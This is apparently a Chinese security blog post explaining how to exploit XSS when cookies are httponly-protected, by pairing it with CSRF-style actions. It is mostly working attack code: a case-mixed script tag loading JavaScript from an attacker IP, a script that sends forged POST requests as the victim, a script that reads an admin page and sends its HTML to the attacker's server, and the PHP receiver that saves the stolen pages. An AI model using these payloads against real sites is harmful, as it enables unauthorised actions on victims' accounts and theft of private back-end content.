XSS 漏洞利用方式,最直接的就是盗取cookie,使用cookie实现用户登录。 但如果有 httponly 防护,cookie 也就无法被窃取,又当如何?试想过 当 XSS 遇上 CSRF 又会擦出怎样的火花?
首先 XSS 调用 外部恶意的js文件(有时候会被谷歌拦截)
1
|
<sCRiPt sRC=http://120.79.*/ajax></sCrIpT>
|
敏感操作
外部js
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
|
function ajaxPost(url,data) { var xmlhttp; if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("POST",url,true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(data); } url="网站目录文件路径"; data="post数据"; ajaxPost(url,data);
|
获取后台源码
外部js
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29
|
function createXmlHttp() { if (window.XMLHttpRequest) { // IE7+, Firefox, Chrome, Opera, Safari 浏览器执行代码 xmlhttp=new XMLHttpRequest(); } else { // IE6, IE5 浏览器执行代码 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } } createXmlHttp(); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { code=escape(xmlhttp.responseText); createXmlHttp(); url = "http://120.79.*/receive.php"; //这里是我们服务器接受的地址 params= "htmlcode=" + code +"&filename=admin.html"; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(params) } } xmlhttp.open("GET","/后台页面路径",true); xmlhttp.send();
|
后台接收的receive.php(此文件所在的目录要有写入的权限)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
|
<?php
function js_unescape($str) { $ret = ''; $len = strlen($str); for ($i = 0;$i < $len;$i++) { if ($str[$i] == '%' && $str[$i + 1] == 'u') { $val = hexdec(substr($str, $i + 2, 4)); if ($val < 0x7f) $ret.= chr($val); else if ($val < 0x800) $ret.= chr(0xc0 | ($val >> 6)) . chr(0x80 | ($val & 0x3f)); else $ret.= chr(0xe0 | ($val >> 12)) . chr(0x80 | (($val >> 6) & 0x3f)) . chr(0x80 | ($val & 0x3f)); $i+= 5; } else if ($str[$i] == '%') { $ret.= urldecode(substr($str, $i, 3)); $i+= 2; } else $ret.= $str[$i]; } return $ret; } $data = js_unescape($_POST['htmlcode']); //对获得源码js_unescape解码。 $filename = $_POST['filename'] . date("y-m-d-h-i-s") . ".html"; $myfile = fopen($filename, "w"); fwrite($myfile, $data); fclose($myfile); ?>
|
FROM :blog.cfyqy.com | Author:cfyqy
评论